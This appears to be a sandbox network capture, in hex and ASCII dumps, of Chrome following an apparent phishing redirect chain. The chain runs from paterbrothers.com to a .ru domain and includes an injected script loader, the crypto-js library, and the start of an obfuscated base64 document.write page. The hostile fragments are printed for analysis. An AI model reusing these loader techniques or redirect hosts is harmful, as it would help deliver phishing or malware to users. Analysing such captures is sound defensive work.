                                                                                                        2024-12-18 22:16:42 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29
                                                                                                        Data Ascii: function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.44973869.49.245.1724432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:42 UTC434OUTGET /res444.php?2-68747470733a2f2f44374d2e6b637a63796c766a7562752e72752f784a456f6233562f-butterbur HTTP/1.1
                                                                                                        Host: paterbrothers.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:42 UTC196INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:40 GMT
                                                                                                        Server: Apache
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Connection: close
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Content-Type: text/javascript;charset=UTF-8
                                                                                                        2024-12-18 22:16:42 UTC1999INData Raw: 37 63 33 0d 0a 20 20 20 20 76 61 72 20 54 4b 77 41 71 65 74 46 43 55 4c 54 66 7a 4b 63 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 54 4b 77 41 71 65 74 46 43 55 4c 54 66 7a 4b 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 54 4b 77 41 71 65 74 46 43 55 4c 54 66 7a 4b 63 29 3b 0d 0a 54 4b 77 41 71 65 74 46 43 55 4c 54 66 7a 4b 63 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                        Data Ascii: 7c3 var TKwAqetFCULTfzKc = document.createElement("script");TKwAqetFCULTfzKc.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(TKwAqetFCULTfzKc);TKwAqetFCULTfzKc.onload=function()


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.449741104.17.24.144432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:44 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                        Host: cdnjs.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:44 UTC960INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:44 GMT
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cache-Control: public, max-age=30672000
                                                                                                        ETag: W/"5eb03e2d-bb78"
                                                                                                        Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Timing-Allow-Origin: *
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 212616
                                                                                                        Expires: Mon, 08 Dec 2025 22:16:44 GMT
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jHRpoQBtHOx2ATG8mnmwUqIv0ZhpskXeZoXgZwhrR%2BVy%2FxOKUhbpxmdoC%2FbWd4WI%2FJ1rb3wvudSY91tRodR8wcEBUpGtdbSX2RbHqOvaLuSFKvvXNpVE9AdvcbTri3YadD6oN8uy"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f4284de48a1c3f5-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:16:44 UTC409INData Raw: 37 62 66 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                        Data Ascii: 7bf1!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                        2024-12-18 22:16:44 UTC1369INData Raw: 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f
                                                                                                        Data Ascii: t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeo
                                                                                                        2024-12-18 22:16:44 UTC1369INData Raw: 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63
                                                                                                        Data Ascii: =0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:func
                                                                                                        2024-12-18 22:16:44 UTC1369INData Raw: 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63
                                                                                                        Data Ascii: (t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProc
                                                                                                        2024-12-18 22:16:44 UTC1369INData Raw: 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30
                                                                                                        Data Ascii: ===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0
                                                                                                        2024-12-18 22:16:44 UTC1369INData Raw: 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30
                                                                                                        Data Ascii: (e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0
                                                                                                        2024-12-18 22:16:44 UTC1369INData Raw: 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36
                                                                                                        Data Ascii: -o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=429496
                                                                                                        2024-12-18 22:16:44 UTC1369INData Raw: 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29
                                                                                                        Data Ascii: A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38])
                                                                                                        2024-12-18 22:16:44 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c
                                                                                                        Data Ascii: one.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<
                                                                                                        2024-12-18 22:16:44 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29
                                                                                                        Data Ascii: function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.449745104.21.78.1814432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:45 UTC655OUTGET /xJEob3V/ HTTP/1.1
                                                                                                        Host: d7m.kczcylvjubu.ru
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:46 UTC1248INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:46 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Cache-Control: no-cache, private
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D2sAlqCxvP4IDBAXy%2B7qNs4z5yp3khwJh2XkmoSVXcmpJE%2Fn6672cdR0ICDTrUODSbH1BGKPwV8MLEiDS9hfuBBmne9j%2F8%2BkxzDBaeZaAec%2BnBbIsKIIyOEtCI%2B0Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4288&min_rtt=4284&rtt_var=1615&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1560&delivery_rate=659106&cwnd=240&unsent_bytes=0&cid=c512d7239708166c&ts=136&x=0"
                                                                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6IldUWG80MS9TS0w2NytNZytpRWhhY3c9PSIsInZhbHVlIjoicVJYNFZWMmkydnUrZ0FMcEF2cGJTZmlsaFl3ZmRsVUdjaUhNZU5zVWFVeG1FZTZiYUxIaG9ZekdHdjNSb0oybWZicll0ODlRWkNMSnRZd1N6ZlBuOCtHemlEUzM1bUh5VzlHdk5FSEFYQjREOS9zZXVmK014OFNyNTVDOWJ0YXoiLCJtYWMiOiIyODgxYTM3Zjk5NGU1NjBlZmFiODFmNWNiOTcwNzMxZmY5MzEwZWFiZGM3NTAxMzQyMTg2ZmRlNGMzNWM3NjEzIiwidGFnIjoiIn0%3D; expires=Thu, 19-Dec-2024 00:16:46 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                        2024-12-18 22:16:46 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 68 57 62 45 56 55 54 46 68 61 57 6b 35 78 55 48 63 30 4d 6b 74 33 4c 32 39 7a 56 6d 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 6c 4a 54 62 56 52 35 5a 6d 56 43 65 57 5a 77 62 48 42 79 64 33 4a 45 61 47 64 5a 55 32 30 79 4e 54 5a 71 62 58 6c 4e 65 56 6c 6e 52 32 63 35 55 6c 5a 51 4d 6b 46 4f 4e 55 55 78 61 55 55 72 52 32 4e 53 59 32 35 30 53 55 4a 72 56 6e 45 77 61 69 39 5a 5a 46 52 6c 5a 7a 5a 49 4e 31 41 35 4d 33 64 57 56 32 31 36 56 46 4a 34 52 30 49 32 63 58 6c 4d 62 30 56 53 54 33 46 48 53 31 4d 30 54 30 5a 69 59 33 42 46 52 31 56 6e 64 32 68 6c 62 54 64 55 59 6d 73 33 53 32 6f 7a 52 45 5a 4c 51 54 67 31 61 56 42 52 54 48 6f
                                                                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjhWbEVUTFhaWk5xUHc0Mkt3L29zVmc9PSIsInZhbHVlIjoiTlJTbVR5ZmVCeWZwbHByd3JEaGdZU20yNTZqbXlNeVlnR2c5UlZQMkFONUUxaUUrR2NSY250SUJrVnEwai9ZZFRlZzZIN1A5M3dWV216VFJ4R0I2cXlMb0VST3FHS1M0T0ZiY3BFR1Vnd2hlbTdUYms3S2ozREZLQTg1aVBRTHo
                                                                                                        2024-12-18 22:16:46 UTC1369INData Raw: 34 64 39 36 0d 0a 3c 21 2d 2d 20 54 72 79 20 6e 6f 74 20 74 6f 20 62 65 63 6f 6d 65 20 61 20 6d 61 6e 20 6f 66 20 73 75 63 63 65 73 73 2e 20 52 61 74 68 65 72 20 62 65 63 6f 6d 65 20 61 20 6d 61 6e 20 6f 66 20 76 61 6c 75 65 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 56 53 79 35 72 59 33 70 6a 65 57 78 32 61 6e 56 69 64 53 35 79 64 53 39 34 53 6b 56 76 59 6a 4e 57 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53
